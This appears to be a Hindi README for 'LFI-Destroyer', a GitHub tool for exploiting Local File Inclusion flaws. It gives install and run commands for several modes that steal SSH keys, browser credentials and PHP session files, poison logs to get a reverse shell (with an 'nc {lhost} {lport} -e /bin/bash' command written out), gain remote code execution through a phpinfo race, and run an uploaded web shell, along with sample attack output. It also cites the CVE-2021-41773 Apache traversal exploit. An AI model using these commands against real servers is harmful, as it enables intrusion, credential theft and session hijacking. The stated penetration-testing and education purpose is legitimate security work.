
यह प्रोग्राम आपसे लोकल फाइल इन्क्लूजन (Local File Inclusion) की जानकारी मांगता है और स्वचालित रूप से /etc/passwd फ़ाइल को खोजता है, और मिले उपयोगकर्ता नामों का उपयोग करके किसी भी SSH कुंजी या कुंजियों के प्रकार को स्थानीय कंप्यूटर पर खोजकर डाउनलोड करता है। यह प्रोग्राम CVE-2021-41773_ apache2.4.49 और 50 ट्रैवर्सल पथ एक्सप्लॉइट भी निष्पादित करता है। इसके अलावा अन्य LFI कमजोरियों के लिए भी काम करता है।
🔥 LFI-Destruction – अधिकृत पेनिट्रेशन टेस्टिंग फ्रेमवर्क LFI-Destroyer एक व्यापक, मॉड्यूलर स्थानीय फ़ाइल समावेशन (LFI) शोषण फ्रेमवर्क है जो अधिकृत सुरक्षा पेशेवरों के लिए डिज़ाइन किया गया है। यह कई आक्रमण तकनीकों को एक ही उपयोग में आसान टूल में जोड़ता है:
LFI-OSCP.py OSCP परीक्षा के लिए सुरक्षित संस्करण है जिसमें 0 ऑटो एक्सप्लॉइट हैं। यह मूल रूप से एक बहुत ही सुंदर फ़ज़र है जो एक्सप्लॉइट की पुष्टि करने पर मैन्युअल निर्देश प्रिंट करता है कि एक्सप्लॉइट कैसे करें।
⚠️ कानूनी अस्वीकरण यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए है। इसे उपयोग करने से पहले आपके पास सिस्टम स्वामी से स्पष्ट लिखित अनुमति होनी चाहिए। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व नहीं लेता है।
📦 स्थापना
# 1. Clone the repository
git clone https://github.com/RevShellXD/LFI-Destroyer.git
cd LFI-Destroyer
# 2. Install dependencies (only colorama is required; others are optional)
pip install colorama
# 3. Make the main script executable
chmod +x LFI-Destroyer.py
🚀 त्वरित प्रारंभ – मोड 1 (SSH / ब्राउज़र आर्टिफैक्ट फ़ज़िंग)
python3 LFI-Destroyer.py
Linux या Windows चुनें।
LFI-Destruction/
LFI-Destruction.py
modes/__init__.py ,mode3_phpinfo_race.py, mode4_upload_trigger.py, mode5_session_grabber.py
artifacts/
README.md
आक्रमण मोड 1 चुनें। अपने LFI एंडपॉइंट को कॉन्फ़िगर करने के लिए संकेतों का पालन करें। स्क्रिप्ट स्वचालित रूप से उपयोगकर्ताओं की गणना करेगी, अस्तित्व सत्यापित करेगी (Windows NTUSER.DAT बीकन का उपयोग करता है), और SSH कुंजियों, ब्राउज़र क्रेडेंशियल्स और अन्य संवेदनशील फ़ाइलों के लिए पुनरावर्ती रूप से फ़ज़ करेगी। सभी आर्टिफैक्ट ./artifacts/ निर्देशिका में सहेजे जाते हैं।
📝 मोड 2 – लॉग पॉइज़निंग और रिवर्स शेल
python3 LFI-Destroyer.py --log-poisoning --log-vector ua
या इंटरैक्टिव रूप से चलाएँ और मोड 2 चुनें।
क्या होता है:
कस्टम रिवर्स शेल:
python3 LFI-Destroyer.py --log-poisoning --log-vector ua --custom-shell "nc {lhost} {lport} -e /bin/bash"
प्लेसहोल्डर्स {lhost} और {lport} आपके लिसनर IP/पोर्ट से बदल दिए जाएंगे।
🧪 BETA – मोड 3: phpinfo() रेस कंडीशन RCE स्थिति: Beta – गलत कॉन्फ़िगर किए गए PHP सर्वरों पर file_uploads=On और सुलभ phpinfo() के साथ विश्वसनीय रूप से काम करता है।
पूर्वापेक्षाएँ:
चलाएँ:
python3 LFI-Destroyer.py
# मोड 3 चुनें
सामान्य रूप से LFI विवरण प्रदान करें। स्क्रिप्ट करेगी:
[*] Bruteforcing phpinfo.php (45 paths) ...
[+] Found phpinfo.php at http://192.168.1.100/phpinfo.php
[+] file_uploads=On (max size: 8M)
[+] Attempt race condition RCE? (y/N): y
[*] Race attempt 1/3 ...
[+] Extracted temporary file path: /tmp/phpABC123
[+] RCE confirmed via temporary file!
[!] LOG POISONING SUCCESSFUL! Ready to escalate to reverse shell.
🧪 BETA – मोड 4: अपलोड की गई फ़ाइल ट्रिगर स्थिति: Beta – मानता है कि आप पहले ही PHP शेल अपलोड कर चुके हैं (जैसे, किसी अन्य भेद्यता या मैन्युअल अपलोड के माध्यम से)। फिर स्क्रिप्ट इसे शामिल करने और कमांड निष्पादित करने के लिए LFI का उपयोग करती है।
दो ऑपरेशन मोड:
चलाएँ:
python3 LFI-Destroyer.py
# मोड 4 चुनें
पथ या 'brute' दर्ज करें। स्क्रिप्ट करेगी:
Enter path to uploaded file (relative to web root), or 'brute' to try common locations: uploads/shell.php
[*] Trying uploads/shell.php ...
[+] SUCCESS! Shell executed at uploads/shell.php
[+] Command output:
www-data
Attempt reverse shell? (y/N): y
🧪 BETA – मोड 5: PHP सत्र गणना और हाइजैकिंग स्थिति: Beta – session.save_path (phpinfo() या फ़ॉलबैक वर्डलिस्ट के माध्यम से निर्धारित) से सत्र फ़ाइलें पढ़ता है, उन्हें सहेजता है, और आवश्यक होने पर base64 डिकोडिंग का प्रयास करता है।
चलाएँ:
python3 LFI-Destroyer.py
# मोड 5 चुनें
सत्र आईडी या गणना के लिए 'list' दर्ज करें। उदाहरण:
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: abc123
[*] Reading /var/lib/php/sessions/sess_abc123 ...
[+] Session file retrieved!
[--- SESSION DATA (raw) ---]
username|s:5:"admin";user_id|i:1;
सत्र निर्देशिका सूची (यदि निर्देशिका अनुक्रमण सक्षम है):
Enter session ID to retrieve (PHPSESSID), or 'list' to enumerate: list
[+] Found 12 session files:
- sess_abc123
- sess_def456
...
सभी सत्र फ़ाइलें artifacts/session_* में सहेजी जाती हैं। यदि डेटा base64-एन्कोडेड प्रतीत होता है, तो स्क्रिप्ट स्वचालित रूप से php://filter/convert.base64-decode बाइपास का प्रयास करती है और एक डिकोडेड संस्करण सहेजती है।
🧠 उन्नत मोड (-adv) अतिरिक्त LFI तकनीकों को सक्षम करें:
python3 LFI-Destroyer.py -adv
⚙️ कमांड-लाइन फ़्लैग
| फ़्लैग | विवरण |
|---|---|
--os {linux,windows} | लक्ष्य OS बलपूर्वक सेट करें |
--auto-depth | ट्रैवर्सल गहराई स्वचालित रूप से पता लगाएं |
--wordlist FILE | कस्टम फ़ाइल पथ वर्डलिस्ट (OS डिफ़ॉल्ट को ओवरराइड करता है) |
--userlist FILE | कस्टम Windows उपयोगकर्ता नाम (मोड 1) |
--beacon-file PATH | कस्टम बीकन फ़ाइल (डिफ़ॉल्ट: NTUSER.DAT) |
--custom-shell CMD | कस्टम रिवर्स शेल कमांड ({lhost} और {lport} का उपयोग करें) |
--log-poisoning | CLI से मोड 2 सक्षम करें (कोई इंटरैक्टिव मोड चयन नहीं) |
--log-vector {ua,referer,xff,header,param} | लॉग पॉइज़निंग के लिए इंजेक्शन वेक्टर |
--log-header NAME | कस्टम हेडर नाम (वेक्टर=header के लिए) |
--log-param NAME | कस्टम पैरामीटर नाम (वेक्टर=param के लिए) |
--log-files FILE | कस्टम लॉग पथ सूची |
--rce-command CMD | RCE सत्यापन के लिए परीक्षण कमांड |
--proxy URL | HTTP प्रॉक्सी (जैसे, http://127.0.0.1:8080) |
--rate FLOAT | अनुरोधों के बीच देरी (सेकंड) |
--output FILE | परिणाम JSON में सहेजें |
--dry-run | कॉन्फ़िगरेशन का परीक्षण करें – कोई अनुरोध नहीं भेजा गया |
--no-color | रंगीन आउटपुट अक्षम करें |
मोड 3, 4 और 5 को modes/ निर्देशिका से गतिशील रूप से लोड किया जाता है। आप run(config, fuzzer) फ़ंक्शन के साथ एक Python फ़ाइल डालकर आसानी से नए मोड जोड़ सकते हैं।
🧰 आवश्यकताएँ
📜 लाइसेंस और लेखक RevShellXD द्वारा लिखित MIT लाइसेंस के तहत लाइसेंस प्राप्त – अधिकृत सुरक्षा पेशेवरों के लिए निःशुल्क।
केवल शैक्षिक और अधिकृत परीक्षण के लिए। यदि आप इस टूल के साथ कानून तोड़ते हैं, तो आप पूरी तरह से जिम्मेदार हैं।
⭐ स्टार और योगदान करें यदि आपको यह टूल उपयोगी लगता है, तो कृपया GitHub पर रिपॉजिटरी को स्टार करें। पुल रिक्वेस्ट और नए मोड योगदान का स्वागत है – modes/init.py में सरल मॉड्यूल इंटरफ़ेस का पालन करें।